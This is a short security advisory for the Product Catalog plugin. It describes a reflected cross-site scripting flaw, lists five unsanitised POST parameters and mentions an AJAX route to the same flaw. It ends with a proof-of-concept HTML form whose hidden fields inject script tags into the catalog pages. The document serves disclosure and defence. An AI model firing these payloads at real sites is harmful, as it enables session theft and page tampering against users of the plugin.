Product Catalog [Reflected XSS]


Plugin registers the shortcodes product-catalogue and product-catalog. Both of them call the \Insert_Product_Catalog() function that is responsible for displaying the actual markup on the product catalog pages. This function doesn’t properly handle user input allowing the injection of HTML elements in the end result.

Vulnerable params are:

  • $_POST['current_page']
  • $_POST['categories']
  • $_POST['sub-categories']
  • $_POST['prod_name']
  • $_POST['tags']

The payload is injectable in various frontend catalog pages such as list view, single product etc. It is also possible through the AJAX action update_catalogue as described in DWF-2016-87108.


<form action="" method="post">
    <input type="hidden" name="current_page" value="'><script>alert(/current_page/)</script><br" />
    <input type="hidden" name="categories" value="'><script>alert(/categories/)</script><br" />
    <input type="hidden" name="sub-categories" value="'><script>alert(/sub-categories/)</script><br" />
    <input type="hidden" name="tags" value="'><script>alert(/tags/)</script><br" />
    <input type="hidden" name="prod_name" value="'><script>alert(/prod_name/)</script><br" />
    <input type="submit"  id="submit-btn" value="Click Me!" />